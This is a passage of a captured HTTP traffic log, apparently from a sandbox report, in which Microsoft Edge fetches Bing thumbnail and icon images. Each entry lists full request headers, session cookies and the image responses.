cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2092
x-check-cacheable: YES
cache-control: public, max-age=5184000
date: Wed, 04 Dec 2024 10:09:00 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306940.405049e4
GET

https://th.bing.com/th?id=ODLS.cc5e5b13-9eb8-40ed-8ebc-14cd84fdfbb7&w=16&h=16&c=7&o=6&pid=1.7

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=ODLS.cc5e5b13-9eb8-40ed-8ebc-14cd84fdfbb7&w=16&h=16&c=7&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1629
cache-control: public, max-age=1291926
date: Wed, 04 Dec 2024 10:09:00 GMT
x-cache: TCP_HIT from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306940.40504a04
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OIP.Oq62JUC-Gx6P-rkRp8kPPwHgFo&w=248&h=121&c=7&rs=1&p=0&o=5&pid=1.7

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OIP.Oq62JUC-Gx6P-rkRp8kPPwHgFo&w=248&h=121&c=7&rs=1&p=0&o=5&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 5706
x-check-cacheable: YES
cache-control: public, max-age=455284
date: Wed, 04 Dec 2024 10:09:00 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306940.405049f3
GET

https://th.bing.com/th?id=ODLS.9360e76b-af7e-411e-a12e-f0b3ad687e62&w=16&h=16&c=7&o=6&pid=1.7

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=ODLS.9360e76b-af7e-411e-a12e-f0b3ad687e62&w=16&h=16&c=7&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2252
x-check-cacheable: YES
cache-control: public, max-age=3893256
date: Wed, 04 Dec 2024 10:09:00 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306940.405049e6
GET

https://th.bing.com/th?id=ODLS.88390ebb-fd85-4b20-be65-a20d14bad498&w=32&h=32&qlt=96&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=ODLS.88390ebb-fd85-4b20-be65-a20d14bad498&w=32&h=32&qlt=96&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 797
x-check-cacheable: YES
cache-control: public, max-age=2162620
date: Wed, 04 Dec 2024 10:09:00 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306940.405049dd
GET

https://th.bing.com/th?id=OIP.TlKLzmlUDOQQQyei_8UCfgHaDt&w=80&h=80&c=1&vt=10&bgcl=6f0c69&r=0&o=6&pid=5.1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OIP.TlKLzmlUDOQQQyei_8UCfgHaDt&w=80&h=80&c=1&vt=10&bgcl=6f0c69&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1252
x-check-cacheable: YES
cache-control: public, max-age=1594564
date: Wed, 04 Dec 2024 10:09:00 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306940.405049fb
GET

https://th.bing.com/th?id=ODLS.ec425630-a5e1-4086-9f28-d2445866eb09&w=32&h=32&qlt=97&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=ODLS.ec425630-a5e1-4086-9f28-d2445866eb09&w=32&h=32&qlt=97&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
